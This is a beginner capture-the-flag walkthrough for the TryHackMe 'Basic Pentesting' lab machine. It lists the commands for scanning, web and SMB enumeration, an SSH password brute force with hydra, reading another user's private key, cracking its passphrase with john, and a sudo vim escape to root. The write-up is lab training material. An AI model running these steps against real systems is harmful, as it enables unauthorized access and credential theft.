Basic Pentesting

beginner45 minWriteup

Your first penetration testing experience

Learning Objectives

  • Perform basic enumeration
  • Find and exploit vulnerabilities
  • Escalate privileges
  • Get root flag

Basic Pentesting is your first real hacking machine on TryHackMe. This walkthrough covers the complete methodology: scanning, enumeration, exploitation, and privilege escalation. Follow along to root your first box!

Try First!

Attempt the machine yourself before reading this walkthrough. The struggle is where learning happens. Only use this guide when stuck.

Step 1: Reconnaissance

bash
1606070;"># Initial port scan
2nmap -sV -sC -oN initial_scan.txt TARGET_IP
3 
4606070;"># Expected results:
5606070;"># 22/tcp   open  ssh
6606070;"># 80/tcp   open  http
7606070;"># 139/tcp  open  netbios-ssn
8606070;"># 445/tcp  open  microsoft-ds (Samba)
9 
10606070;"># Full port scan (background)
11nmap -p- -T4 TARGET_IP -oN full_scan.txt &
12 
13606070;"># Key services found:
14606070;"># - SSH on 22 (potential entry if we find creds)
15606070;"># - HTTP on 80 (web app to enumerate)
16606070;"># - SMB on 139/445 (file shares to check)

Step 2: Web Enumeration

bash
1606070;"># Check the web page
2curl http:606070;">//TARGET_IP
3606070;"># or open in browser
4 
5606070;"># Directory brute forcing
6gobuster dir -u http:606070;">//TARGET_IP -w /usr/share/wordlists/dirb/common.txt
7606070;"># Found: /development
8 
9606070;"># Check /development directory
10curl http:606070;">//TARGET_IP/development/
11 
12606070;"># Found files with interesting info:
13606070;"># - dev.txt (mentions developers Jan and Kay)
14606070;"># - j.txt (mentions weak passwords)
15 
16606070;"># Now we have usernames: jan, kay

Username Discovery

Web pages, comments, and files often leak usernames. These can be used for SSH brute forcing or SMB enumeration. Always note names!

Step 3: SMB Enumeration

bash
1606070;"># Enumerate SMB shares
2smbclient -L 606070;">//TARGET_IP -N
3606070;"># -N = no password (anonymous)
4 
5606070;"># Found shares:
6606070;"># Anonymous - accessible!
7606070;"># IPC$
8 
9606070;"># Connect to Anonymous share
10smbclient 606070;">//TARGET_IP/Anonymous -N
11 
12606070;"># List and download files
13smb: \> ls
14smb: \> get staff.txt
15smb: \> exit
16 
17606070;"># Read downloaded file
18cat staff.txt
19606070;"># Contains more information about users
20 
21606070;"># Alternative enumeration
22enum4linux -a TARGET_IP

Step 4: SSH Brute Force

bash
1606070;"># Now we have usernames: jan, kay
2606070;"># The hint mentioned weak passwords
3 
4606070;"># Brute force jan's SSH password
5hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh:606070;">//TARGET_IP -t 4
6 
7606070;"># Found: jan:armando (or similar weak password)
8 
9606070;"># Alternative with medusa
10medusa -h TARGET_IP -u jan -P /usr/share/wordlists/rockyou.txt -M ssh
11 
12606070;"># Login as jan
13ssh jan@TARGET_IP
14606070;"># Enter password when prompted

Step 5: Initial Access & Enumeration

bash
1606070;"># We're in as jan!
2whoami
3606070;"># jan
4 
5606070;"># Basic enumeration
6id
7606070;"># Check groups
8 
9606070;"># Look for other users
10ls /home/
11606070;"># Found: jan, kay
12 
13606070;"># Check kay's directory
14ls -la /home/kay/
15606070;"># Can we read any files?
16 
17606070;"># Found kay's SSH private key!
18cat /home/kay/.ssh/id_rsa
19 
20606070;"># Copy this key to your machine
21606070;"># On your machine, save it as kay_id_rsa
22 
23606070;"># The key is encrypted - need to crack it!

Step 6: Privilege Escalation

bash
1606070;"># Crack kay's SSH key passphrase
2606070;"># On your machine:
3 
4606070;"># Convert to john format
5ssh2john kay_id_rsa > kay_hash.txt
6 
7606070;"># Crack with john
8john kay_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
9 
10606070;"># Found passphrase: beeswax (or similar)
11 
12606070;"># Set key permissions
13chmod 600 kay_id_rsa
14 
15606070;"># Login as kay
16ssh -i kay_id_rsa kay@TARGET_IP
17606070;"># Enter passphrase when prompted
18 
19606070;"># Now we're kay!
20whoami
21606070;"># kay
22 
23606070;"># Check sudo permissions
24sudo -l
25606070;"># Kay can run vim as root!
26 
27606070;"># Escalate to root via vim
28sudo vim -c 606070;">#a5d6ff;">':!/bin/bash'
29 
30606070;"># We're root!
31whoami
32606070;"># root
33 
34606070;"># Get the flag
35cat /root/root.txt

Complete Attack Path

1
ScanNmap reveals SSH, HTTP, SMB
2
Web EnumFind /development with usernames
3
SMBAnonymous share confirms users
4
Brute ForceHydra finds jan's SSH password
5
Lateral MoveFind kay's SSH key as jan
6
Crack KeyJohn cracks key passphrase
7
RootVim sudo escape to root

Knowledge Check

Quick Quiz
Question 1 of 2

What tool was used to brute force SSH credentials?

Key Takeaways

  • Always do thorough port scanning - services reveal attack vectors
  • Web directories often contain sensitive information
  • SMB anonymous shares may leak credentials or usernames
  • SSH keys without passwords or with weak passphrases are exploitable
  • sudo -l is essential for privilege escalation enumeration